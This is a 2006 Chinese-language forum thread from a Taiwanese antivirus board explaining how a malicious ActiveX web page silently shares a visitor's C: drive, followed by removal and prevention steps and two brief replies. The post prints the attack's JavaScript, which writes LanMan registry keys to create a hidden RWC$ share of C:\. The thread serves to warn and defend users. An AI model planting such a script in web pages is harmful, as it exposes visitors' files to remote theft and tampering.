您尚未
登入
註冊
忘記密碼
搜尋
贊助
贊助本站
數位公仔
紀念T恤
紀念馬克杯
廣告
刊登廣告
廣告價格
線上申請刊登
用雅幣刊登
免費刊登
目前客戶
簡訊
簡訊說明
購買金幣
發送簡訊
預約簡訊
發送記錄
好友通訊
罐頭簡訊
論命
數位論命舘
免費排盤工具
葫蘆墩 優生造命
葫蘆墩 八字命書
影音論命(葫蘆墩)
影音占卜(葫蘆墩)
購買金幣
星座分析
孔明神數
周公解夢
星僑線上論命
娛樂
影 像 行 腳
數 位 造 型
數 位 畫 廊
心 情 日 記
公 益 彩 券
送生日蛋糕
俄羅斯方塊
四 川 省
猜 數 字
比 大 小
泡 泡 龍
許 願 池
萬 年 曆
經 期 計 算
體 重 測 量
音 樂 點 播
衛 星 地 圖
時間戳字幕
男女聊天室
求助
論壇守則
會員等級
會員權限
語法教學
常見問題
最新活動
打工賺雅幣
首頁
新版首頁(全頁)
傳統首頁(全頁)
新版首頁(選單)
傳統首頁(選單)
MyChat 數位男女
命理風水
15
星僑五術軟體
4
葫蘆墩命理網
5
命理問答
9
四柱八字
1
紫微斗數
1
姓名學
手面相
易經占卜
1
風水研討
1
擇日&三式
1
西洋占星
無視論塔羅牌
10
修行&武術
1
中醫研討
五術哈啦
1
電腦資訊
13
硬體討論
5
超頻 & 開箱
3
數位生活
2
PDA 討論
手機討論區
軟體推薦
2
軟體討論
6
Apple 討論
1
Unix-like
網路&防毒
2
程式設計
網站架設
4
電腦教學資源
生活休閒
14
休閒哈啦
7
感情世界
2
上班一族
5
國考&法律
7
生活醫學
4
運動體育
1
單車討論
1
釣魚討論
6
旅遊討論
4
天文觀星
3
攝影分享
8
圖片分享
4
數位影視
2
笑話集錦
3
興趣嗜好
13
文學散文
7
繪圖藝術
1
布袋戲
3
動漫畫討論
3
美食天地
6
理財專區
心理測驗
1
汽、機車
3
寵物園地
模型&手工藝
4
花卉園藝
魔術方塊
獨輪車專區
電玩遊戲
13
遊戲歡樂包
4
CS討論
8
Steam
3
MineCraft
2
東方Project
英雄聯盟LOL
1
單機遊戲
2
WebGame
3
線上遊戲1
6
線上遊戲2
5
電視遊樂器
1
掌上型遊戲
2
模擬器遊戲
1
工商服務
6
虛擬城市
7
好康分享
新品販售
二手拍賣
1
租屋&找屋
工商建議區
1
站務專區
10
最新活動
活動成果
數位造型
心情日記
個人圖庫
新人報到練習
論壇問題建議
1
榮會及電子報討論
-最近版區-
-最近瀏覽-
»
電腦資訊
硬體討論
超頻 & 開箱
數位生活
PDA 討論
手機討論區
軟體推薦
軟體討論
Apple 討論
Unix-like
網路&防毒
程式設計
網站架設
電腦教學資源
»
網路&防毒
網路通訊討論
防毒防駭討論
»
防毒防駭討論
防毒歷史問題
»
防毒歷史問題
»
瀏覽網頁硬碟被共享
手機版
訂閱
地圖
簡體
您是第
7025
個閱讀者
可列印版
加為IE收藏
收藏主題
上一主題
|
下一主題
upside
反病毒 反詐騙 反虐犬
級別:
版主
版區:
硬體討論
,
公益互助
,
PDA 討論
,
手機討論區
,
詐騙資訊
,
網路&防毒
x372
x2016
分享:
▼
x
0
[資訊教學] 瀏覽網頁硬碟被共享
現在上網真是不安全,前一陣子鬧得最凶的是“萬花谷”,如果進入該網頁瀏覽者注冊表會被修改,好多系統功能因此受到限
製。最近又聽說有網友在瀏覽網頁時硬碟被共享,危害似乎更大!
其實,所謂的瀏覽網頁硬碟被共享,和“萬花谷”一樣,受害者都是在瀏覽了含有有害代碼的ActiveX網頁文件後中招的。
以下是該網頁原代碼中的關鍵部分﹕
script language=JavaScript
document.write("");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\RWC$\\Flags",302,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\Network\\LanMan\\ RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\
LanMan\\RWC$\\Path","C:\\"
);
}
function init()
{
setTimeout("f()", 1000);
}
init();
/script
注意﹕以“Shl.RegWrite”開頭的這幾句代碼的作用是寫入瀏覽者的注冊表,在HKEY_LOCAL_MACHINE\Software\Microsoft
\Windows\CurrentVersion\Network\LanMan下面添加鍵值“RWC$” ,在RWC$”下又分別建立鍵值“Flags”、“Type”
“Path”,這樣就把c盤設為共享了,共享名為RWC$。而且你在網絡屬性中還看不到硬碟被共享了!如果
把"Flags"=dword:00000302改成"Flags"=dword:00000402就可看到硬碟被共享。
由於只要瀏覽這類網頁硬碟即被共享,因此其危害較之木馬更大(個人觀點)。如果不小心中招,那麼給你下套的人完全
可以把你的硬碟當做他的一個邏輯硬碟,他可以在你電腦中隨意拷貝文件,刪除文件,給文件改名……如果這樣還不能令他滿
意,他完全可以給你再下個木馬(哦,錯了!不是一個、是一群木馬),那樣你就生不如死了,什麼秘密都沒有了﹕上網賬
號、QQ密碼、給MM的信件……如果他高興還可以格式化你的硬碟,或者是在你的電腦中運行“江民炸彈”之類的軟件破壞你
的硬碟。總之,你的一切都在他的掌握之下了,想想夠可怕了吧?
解決辦法﹕把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“RWC$”刪掉。
狠一點的,也可以把windows\system\下面的Vserver.vxd(Microsoft 網絡上的文件與打印機共享,虛擬設備驅動程序)刪掉,再把
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver鍵值刪掉,永絕這類“木馬”的後路吧。
防御防範﹕
1、不要輕易去一些自己並不了解的站點,特別是那些看上去美麗誘人的網址更不要貿然前往,否則吃虧的往往是你。
2、運行IE,點擊“工具→Internet選項→安全→Internet區域的安全級別,把安全極別由“中”改為“高”
3、由於該類網頁是含有有害代碼的ActiveX網頁文件,因此在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以
避免中招。具體方法是﹕在IE窗口中點擊“工具→Internet選項,在彈出的對話框中選擇“安全”標簽,再點擊“自定義級別”
按鈕,就會彈出“安全設置”對話框,把其中所有ActiveX插件和控件以及Java相關全部選擇“禁用”即可。不過,這樣做在以
後的網頁瀏覽過程中可能會造成一些正常使用ActiveX的網站無法瀏覽。唉,有利就有弊,你還是自己看著辦吧。
4、對於Windows98用戶,請打開C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class”刪掉;
對於WindowsMe用戶,請打開C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”刪掉。請放心,
刪除這個組件不會影響到你正常瀏覽網頁的。
5、既然這類網頁是通過修改注冊表來破壞我們的系統,那麼我們可以事先把注冊表加鎖﹕禁止修改注冊表,這樣就可以
達到預防的目的。不過,自己要使用注冊表編輯器regedit.exe該怎麼辦呢?因此我們還要在此前事先準備一把“鑰匙”,以便打
開這把“鎖”!
加鎖方法如下﹕
(1)運行注冊表編輯器regedit.exe;
(2)展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,新建一個名為
DisableRegistryTools的DWORD值,並將其值改為“1”,即可禁止使用注冊表編輯器regedit.exe。
解鎖方法如下﹕
用記事本編輯一個任意名字的.reg文件,比如unlock.reg,內容如下﹕
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
存盤。你就有了一把解鎖的鑰匙了!如果要使用注冊表編輯器,則雙擊unlock.reg即可。要注意的是,在“REGEDIT4”後
面一定要空一行,並且“REGEDIT4”中的“4”和“T”之間一定不能有空格,否則將前功盡棄!
6、安裝網絡防火牆,特別是安裝了Norton2001後,進入該類網頁就會報警提示有腳本寫注冊表,國產反病毒軟件
KVW3000也有此類功效,建議你也安裝一個這樣的軟件。
7、雖然經過一番辛苦的勞動修改回了標題和默認連接首頁,但如果以後又不小心進入該站就又得麻煩一次。其實,你可
以在IE中做一些設置以便永遠不進該站點﹕
打開IE,點擊“工具”→“Internet選項”→“內容”→“分級審查”,點“啟用”按鈕,會調出“分級審查”對話框,然後點
擊“許可站點”標簽,輸入不想去的網站網址,如輸入﹕http://www.sohu8.com,按“從不”按鈕,再點擊“確定”即大功告
成!
爸爸 你一路好走
x
0
[樓 主]
From:台灣 |
Posted:
2006-10-24 18:04 |
roger70609
級別:
小人物
x0
x11
分享:
▲
▼
哇~~
原來有這麼恐怖的事情喔@@
x
0
[1 樓]
From:台灣中華電信 |
Posted:
2006-10-24 20:02 |
sang
級別:
知名人士
x49
x4916
分享:
▲
@@".upside版主提供的好詳細哦.
的確,因為很多人沒有留意瀏覽網頁時已經網頁指令的指向改變了本身的ie設定.所以有時我們也必須常去注意防毒之外的
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion 下的設定是不是被人動了手腳,現在已經不是單純的改變某幾個檔案而已了..
http://bbs.mychat.to/user.php?a=SANG
x
0
[2 樓]
From:台灣數位聯合 |
Posted:
2006-10-24 20:11 |
MyChat 數位男女
»
防毒歷史問題
Powered by
PHPWind
v1.3.6
Copyright © 2003-04
PHPWind
Processed in 0.055521 second(s),query:16 Gzip disabled
本站由
瀛睿律師事務所
擔任常年法律顧問 |
免責聲明
|
本網站已依台灣網站內容分級規定處理
|
連絡我們
|
訪客留言